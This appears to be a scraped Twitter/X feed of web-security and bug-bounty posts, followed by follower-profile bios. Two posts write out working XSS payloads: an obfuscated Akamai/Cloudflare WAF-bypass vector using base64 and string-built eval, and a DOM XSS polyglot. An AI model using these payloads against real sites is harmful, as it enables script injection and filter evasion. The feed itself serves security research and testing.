I just found a WAF bypass for Akamai and Cloudflare:
<address onscrollsnapchange=window['ev'+'a'+(['l','b','c'][0])](window['a'+'to'+(['b','c','d'][0])]('YWxlcnQob3JpZ2luKQ==')); style=overflow-y:hidden;scroll-snap-type:x><div style=scroll-snap-align:center>1337</div></address>
Typical CSS injection often relies on repeated context loading (usually via iframes) to exfiltrate sensitive tokens.
I found this tool by @ixSly that's both fast and works in Chrome and Safari. It can leak tokens with just a single CSS import by leveraging -webkit-cross-fade 🤯…
Path traversal opens doors to secrets, source code and even RCE when chained with other exploits 📂 Level up your #BugBounty hunting skills with our practical guide to path traversal and arbitrary file read attacks 👇
yeswehack.com/learn-bug-boun…
Just released a new recollapse version thanks to @ryancbarnett and @4ng3lhacker after their talk in @BlackHatEvents today.
What’s new?
💥Mode 6: Fuzz case folding/upper/lower
💥 Mode 7: Fuzz byte truncations
💥 Recollapse is now available to use as a python library and…
Is your target leaking CSP violations left and right? Mikhail Khramenkov reveals how to hijack the onsecuritypolicyviolation event to trigger JS in hidden inputs - when unsafe-inline is in play and styles are blocked. Now live on our XSS cheat sheet.
Link to vector👇
Recently, I was testing application and the injection was inside the image tag where src attribute has the valid image path I can break out using " however <> were encoded into HTML entities. I can use other event handlers like onmousever to trigger the XSS. 1/n
Ambiguous URLs are behind many SSRF, CORS, and redirect flaws, but most bypasses are scattered and undocumented.
This cheat sheet consolidates payloads, encodings, and IP tricks into one place to assist your testing.
Check it out: portswigger.net/web-security/s…
A DOM-Based #XSS Polyglot
1;/*'"><Img/Src/OnError=/**/confirm(1)//>
If your input happens to end up in the DOM via innerHTML or eval(), it works for both cases.
PoCs below.
innerHTML: x55.is/brutelogic/dom…
eval(): x55.is/brutelogic/dom…
When HTTP/1.1 Must Die lands at DEFCON we’ll publish a @WebSecAcademy lab with a new class of desync attack. One week later, I’ll livestream the solution on air with @offby1security! You’re invited :)
youtube.com/live/B7p8dIB7b…
"Funky chunks: abusing ambiguous chunk line terminators for request smuggling" - quality research by @__w4ke! Also thankfully it doesn't overlap with my upcoming presentation 😅
w4ke.info/2025/06/18/fun…
5K Followers 4K FollowingWelcome to the unofficial OpenDocument Format channel on Twitter. General information in English, Spanish or Portuguese. News, tips, tricks, apps and more!
263 Followers 3K FollowingUnbelievable coupon savings and shopping deals for your favorite blackhat software, services, and more - fresh new coupons always at your fingertips!
1K Followers 2K FollowingFixated with marketing my online business, blogging and learning. Will only follow people I think I can learn from and perhaps JV with.
812 Followers 920 FollowingSr. Malware Research Mgr @ GoDaddy / Sucuri Inc. | Web Malware Analysis | Reverse Eng | Passionate about protecting the Web | Tweets and Thoughts are my own
10K Followers 0 FollowingAssetnote combines advanced reconnaissance and high-signal continuous security analysis to help enterprises gain insight and control of their evolving exposure.
18K Followers 222 FollowingAnda boleh melakukan segala-galanya dari syurga ke bumi, wanita kecil!!
If you have any questions, please contact me
https://t.co/MkzsavUU9V
12K Followers 527 Followingcalico cat, trans girl, lesbian, she/any. most posts are unserious. head of sales at @flipper_zero, but opinions are my own. 🐈❤️🐈⬛
95K Followers 2K FollowingHacker, marketer. I manage socials and produce amazing technical blogs for cybersecurity orgs. Founder of @hacker_content and @haksecio
68K Followers 586 FollowingHigh Queen of the Cybers | Educator | Content Creator | UwU-Anointed Wapp King | Ex-Brit | https://t.co/04RRExvxXj (he/him) 🇺🇸 I run gameshows at DEF CON.
476 Followers 92 FollowingTechnology enthusiast and mobile security researcher experienced in pentesting of mobile apps. Reach out at [email protected] for technical consultation.
1K Followers 1 Followingjswzl helps make web application testing easier with static analysis, making it easier to audit JS code and do your recon/mapping
48K Followers 452 FollowingSecurity researcher with a focus on hardware & firmware. I occasionally publish stuff on YouTube. Co-founder of @hextreeio. Contact: [email protected]